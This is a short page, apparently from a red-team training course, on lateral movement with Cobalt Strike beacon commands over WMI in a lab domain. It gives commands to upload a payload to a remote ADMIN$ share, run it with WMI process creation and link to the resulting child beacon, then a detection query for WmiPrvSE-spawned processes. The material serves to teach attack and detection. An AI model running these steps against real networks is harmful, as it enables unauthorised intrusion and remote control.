Windows Management Instrumentation (WMI)
As you may have noticed, WMI is not part of the jump
command but it is part of remote-exec
. The remote-exec
method uses WMI's "process call create" to execute any command we specify on the target. The most straight forward means of using this is to upload a payload to the target system and use WMI to execute it.
You can upload a file to a remote machine by cd
'ing to the desired UNC path and then use the upload
command.
beacon> cd \\web.dev.cyberbotic.io\ADMIN$
beacon> upload C:\Payloads\smb_x64.exe
beacon> remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
Started process 3280 on web.dev.cyberbotic.io
\
The process is now running on WEB so now we need to connect to it.
beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
[+] established link to child beacon: 10.10.122.30
\
As with WinRM, the process will be running in an elevated context of the calling user.

\
When a binary is executed via WMI in this way, it will be a child of WmiPrvSE.exe
. We can therefore look for process create events where WmiPrvSE is the parent.
event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe
\

Last updated